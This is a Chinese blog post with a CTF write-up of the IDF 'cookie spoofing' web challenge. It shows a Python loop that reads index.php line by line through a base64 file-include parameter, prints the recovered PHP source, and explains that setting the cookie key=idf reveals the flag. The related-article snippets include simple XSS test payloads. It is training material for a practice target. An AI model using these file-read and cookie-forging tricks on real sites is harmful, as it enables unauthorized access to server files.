idf cookie欺骗

最新推荐文章于 2021-12-15 21:32:14 发布
最新推荐文章于 2021-12-15 21:32:14 发布
阅读量635 收藏
点赞数
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjsxxzh/article/details/51274911
版权

http://ctf.idf.cn/game/web/40/index.php?line=&file=ZmxhZy50eHQ

打开后就一串长长的码 不知所云
注意到ZmxhZy50eHQ 估计是BASE64
查询 得到flag.txt
放进去啥都没(无言以对)
大牛说是文件包含漏洞(什么是文件包含漏洞?去百度百度)
把file=aW5kZXgucGhw(index.php的base64)line=1发现有代码
测试line发现有个18行

写一个python弄出全部代码(py3)

import urllib.request
i=0
while(i<20):
    file = urllib.request.urlopen("http://ctf.idf.cn/game/web/40/index.php?line=%d&file=aW5kZXgucGhw"% i).read()
    print(file.decode('utf-8'))
    i=i+1

得到

<?php


    error_reporting(0);


    $file=base64_decode(isset($_GET['file'])?$_GET['file']:"");


    $line=isset($_GET['line'])?intval($_GET['line']):0;


    if($file=='') header("location:index.php?line=&file=ZmxhZy50eHQ");


    $file_list = array(


        '0' =>'flag.txt', 


        '1' =>'index.php',


    );





    if(isset($_COOKIE['key']) && $_COOKIE['key']=='idf'){


        $file_list[2]='flag.php';


    }





    if(in_array($file, $file_list)){


        $fa = file($file);


        echo $fa[$line];


    }


?>

也就是说设置cookie key=idf就行了

zjsxxzh
关注
专栏目录
CTF流量分析1
qq_45766280的博客
08-26 945
流量分析1题解:总结 仅作为学习笔记使用 题目:Q3.pcap 题解: 先在wireshark里看一下 有HTTP先看HTTP,直接在过滤器中选择HTTP 这些包就有意思了,这些请求有些想目录扫描在不断的请求,而大部分的回应都是404,那么我们暂时推断会有访问成功的,往后面找找吧。 这两个语句成功通过了,那我们来详细分析分析这两个包。追踪流->HTTP GET /?c=print_r(gzcompress(file_get_contents(base64_decode(%22aW5kZXguc
IDF-CTF-cookie欺骗 writeup
weixin_30488085的博客
07-20 136
题目链接: http://ctf.idf.cn/index.php?g=game&m=article&a=index&id=40 知识点:base64解码, cookie欺骗 这里这里→ http://ctf.idf.cn/game/web/40/index.php 思路:点击链接跳转到url:http://ctf.idf.cn/game/web/40/i...
cookie欺骗
你的小粉丝的博客
11-09 351
cookie欺骗(100) 写脚本能力和代码审计 1.打开页面一长串的字母,无用; 源码,无用; 观察url http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 参数filename的值是a2V5cy50eHQ=是base64编码,解密后得到keys.txt php解析的时候 line 表示的...
Bugku-CTFcookies欺骗
weixin_33842328的博客
04-24 1250
Day22 cookies欺骗 http://123.206.87.240:8002/web11/ 答案格式:KEY{xxxxxxxx} 本题要点:cookie欺骗、base64编码传参 查看源码 什么也没有 看一下url~ 发现base64编码 解一下 观察url ,发现 a2V5cy50eHQ=...
ctf流量分析练习一
gclome的博客
08-23 3875
最近在学习流量分析这块的内容,找到一篇不错的文章,就准备复盘一下。 原文链接:https://www.freebuf.com/column/169738.html Q1 打开这个流量包,大致分析一下是一个邮箱请求登陆的一个流量包,一眼就看见了 user和pass,需要base64解密一下即可。 base64解密地址:https://base64.supfree.net/ username:test@51elab.com password:FLAG:ISCCTESTpas flag就藏在password里 Q
idf-env 工具帮助设置和管理 ESP-IDF 安装
06-28
idf-env用于维护 ESP-IDF 环境的工具。快速开始在 Windows 上为 ESP 板安装串行驱动程序。在 PowerShell 中执行以下命令:Invoke-WebRequest '...
esp-idf-v4.4.3
05-27
ESP-IDF(Espressif IoT Development Framework)是Espressif Systems公司推出的一个开源框架,用于开发基于ESP32和ESP32-S系列微控制器的物联网应用程序。ESP-IDF v4.4.3 是该框架的一个特定版本,它包含了对ESP32...
ESP-IDF环境安装文件
02-22
ESP-IDF,全称为Espressif IoT Development Framework(Espressif物联网开发框架),是Espressif Systems公司为基于ESP32和ESP8266微控制器的开发提供的一套全面的开源工具集。本压缩包包含ESP-IDF v4.0.1版本,Git ...
esp-idf-zh:ESP-IDF 中文文档
05-01
ESP-IDF 编程指南 - 中文版 本文档是 ESP-IDF 官方文档的中文翻译版。 在线阅读: 中文版地址: 英文版地址: 参与翻译: 所有的.rst文件和部分的.h文件是需要翻译的源文件。翻译前求务必阅读 。 同时也欢迎修您正在...
tf-idf_tf-idf_
10-01
TF-IDF(Term Frequency-Inverse Document Frequency)是一种在信息检索和文本挖掘领域广泛使用的权重计算方法,用于评估一个词在文档中的重要性。这个概念基于两个主要因素:词频(Term Frequency, TF)和逆文档...
【bugku】 cookies欺骗 writeup
perye
02-27 3003
看到url上的参数有base64,解码发现是keys.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- import requests s=requests.Session() url='http://120.24.86.145:8002/web11/in...
CTFweb篇-Cookies欺骗
热门推荐
weixin_44597701的博客
08-06 2万+
什么是cookie 其实cookies是由网络服务器存储在你电脑硬盘上的一个txt类型的小文件,它和你的网络浏览行为有关,所以存储在你电脑上的cookies就好像你的一张身份证,你电脑上的cookies和其他电脑上的cookies是不一样的;cookies不能被视作代码执行,也不能成为病毒,所以它对你基本无害。 cookie可以在报文头的前面进行设置。 例题: 打开是一连串字母,没有用处 于是从URL入手,http://123.206.87.240:8002/web11/index.php?line=&a
PHP反序列化漏洞说明
Ms08067安全实验室
12-27 456
序列化PHP程序为了保存和转储对象,提供了序列化的方法,序列化是为了在程序运行的过程中对对象进行转储而产生的。序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。PH...
CTF training WriteUp
a370793934的专栏
11-26 1万+
三周练习和三周考试的writeup 第一周练习 跨站脚本攻击 (XSS) 随便输下面语句 <SCRIPT>alert('XSS')</SCRIPT> <IMG SRC="#" ONERROR="alert('XSS')"/> <INPUT TYPE="BUTTON" ONCLICK="alert('XSS')"/> <IFRAME...
CTF_WEB(习题)
若比邻的博客
12-15 5196
一、bugku_web_cookie欺骗:https://ctf.bugku.com/challenges/detail/id/87.html 地址栏filename一看为base64,解密为keys.php 尝试index.php加密为base64:aW5kZXgucGhw,读取一下,啥也没有 观察地址栏,将line赋值为1试试,发现是将index.php按行读取了 将index.php读取出来,读读取结果 #cookies欺骗 import requests php=""
IDF实验室-天罗地网-COOKIE欺骗-writeup
sn_RNA的专栏
04-22 6261
最近在学习ctfidf实验室上面遇到了一道题,通过同学和老师的帮助,最终解决了问题。google的时候没有看到这题的write up,那么就由我做第一个吧。 题目描述: COOKIE欺骗 这里这里→ http://ctf.idf.cn/game/web/40/index.php   打开所给的链接得到的网页里面有一个非常长的字符串,并不能猜测是什么样的编码方式
Bugkuctf web cookie欺骗
Amire0x的小乐园
05-07 694
题目链接 又有新东西啦 打开 发现没啥用,查看源码也没什么 注意到URL上有一串类似base64编码的东西 解码 习惯性访问一下 那下面又该咋办呢??? URL里filename有参数,line没有参数 要不试一试价格参数? line=1,啥都没有 注意到filename 的参数是base64编码后的 那再把1,2,3编码一波试试? 又回去了啥都没有。。。 懵逼中。。。 看了一下别人的write...
IDF-CTF-天罗地网
saltor
04-19 8441
不难不易的js加密题目:就是这里 → http://ctf.idf.cn/game/web/28点击链接,弹出一个输入框。要求输入flag。查看源代码,发现一个script脚本。 然后复制到站长工具js混淆加密压缩那里解密。 http://tool.chinaz.com/js.aspx得到解密后的代码:var a = prompt("\u8f93\u5165\u4f60\u7684\x66\x6
基于JavaScript的human-resource-backend后端开发源码设计
最新发布
10-05
该项目是一款以JavaScript为主语言的HR(人力资源)后端开发源码,集成了Java、CSS、Vue和HTML等多种语言,共计1035个文件。具体文件构成如下:236个Java文件、179个JavaScript文件、104个PNG图片文件、59个CSS文件、56个Vue文件、54个GIF动画文件、42个类文件、41个XML文件、36个SVG文件、35个HTML文件。该后端系统旨在构建一个高效的人力资源管理平台。
使用MapReduce实现TF-IDF算法详细步骤
"案例TF-IDF.pdf是一个关于使用MapReduce实现TF-IDF算法的教程,作者提供了源码供参考。TF-IDF是一种在信息检索和文本挖掘中常用的权重计算方法,用于评估一个词在文档中的重要性。这个案例分为三次MapReduce作业来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值